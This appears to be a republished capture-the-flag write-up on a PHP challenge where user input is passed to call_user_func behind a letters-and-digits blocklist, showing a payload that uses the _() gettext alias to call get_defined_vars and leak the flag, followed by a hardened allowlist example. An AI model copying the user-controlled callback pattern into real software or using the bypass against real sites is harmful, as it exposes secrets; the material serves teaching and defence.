PHP features: callback functions and the _ function
阿新 • Published: 2022-04-03
Web 128
Excerpted from https://blog.csdn.net/qq_49480008/article/details/113753951, kept only for personal reference and study!
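<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-10 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-12 19:49:05
*/

error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

// Both values come straight from the query string.
$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    // $f1 is called as a function with $f2 as its argument,
    // and the return value is then called as a function as well.
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}

// Blocklist: passes only when $str contains no ASCII letters or digits.
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

NULL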
Background you need first:
call_user_func function
get_defined_vars function
gettext function
Approach:
var_dump(call_user_func(call_user_func($f1,$f2)));
call_user_func ( callable $callback , mixed $parameter = ? , mixed $... = ? ) : mixed
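The first argument, callback, is the callback function to be called; the remaining arguments are passed to that callback as its parameters.
get_defined_vars — returns an array of all defined variables
_() is an alias of gettext(): printf(gettext("My name is %s.\n"), my_name); is equivalent to printf(_("My name is %s.\n"), my_name);
The name _ contains no letters or digits, so it passes check(), and when no translation exists _() returns its argument unchanged. So the payload can be constructed as: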
?f1=_&f2=get_defined_vars
var_dump(call_user_func(call_user_func($f1,$f2)));
=> var_dump(call_user_func(call_user_func('_', 'get_defined_vars')));
=> var_dump(call_user_func('get_defined_vars'));
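A hardened counterpart to the check() blocklist above, as an added example that is not part of the original post or challenge: the request value selects an entry in a fixed allowlist instead of being used as a function name. ALLOWED_ACTIONS and dispatch() are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not part of the original challenge. ALLOWED_ACTIONS and
// dispatch() are hypothetical names used only for this sketch.

// The challenge's filter: a blocklist that rejects ASCII letters and digits.
function check(string $str): bool {
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

// Hardened form: the request value selects a key in a fixed map and is never
// itself passed to call_user_func() as a function name.
const ALLOWED_ACTIONS = [
    'upper'  => 'strtoupper',
    'length' => 'strlen',
];

function dispatch(string $action, string $arg) {
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        throw new InvalidArgumentException("action not allowed");
    }
    return call_user_func(ALLOWED_ACTIONS[$action], $arg);
}

// Constructed sample values standing in for the f1 request parameter.
// is_callable('_') is true only when the gettext extension is loaded.
foreach (['_', 'upper', 'strlen'] as $name) {
    printf(
        "%-7s blocklist_accepts=%s is_callable=%s allowlisted=%s\n",
        $name,
        var_export(check($name), true),
        var_export(is_callable($name), true),
        var_export(array_key_exists($name, ALLOWED_ACTIONS), true)
    );
}

// The same kind of input through the allowlist dispatcher.
foreach ([['upper', 'abc'], ['_', 'get_defined_vars']] as [$action, $arg]) {
    try {
        echo $action, ' -> ', var_export(dispatch($action, $arg), true), "\n";
    } catch (InvalidArgumentException $e) {
        echo $action, ' -> rejected: ', $e->getMessage(), "\n";
    }
}
```

The first loop shows that the blocklist and "is this a callable name" are unrelated questions; the second shows that the allowlist decides on the key alone, so a callable name outside the map is rejected regardless of which characters it contains.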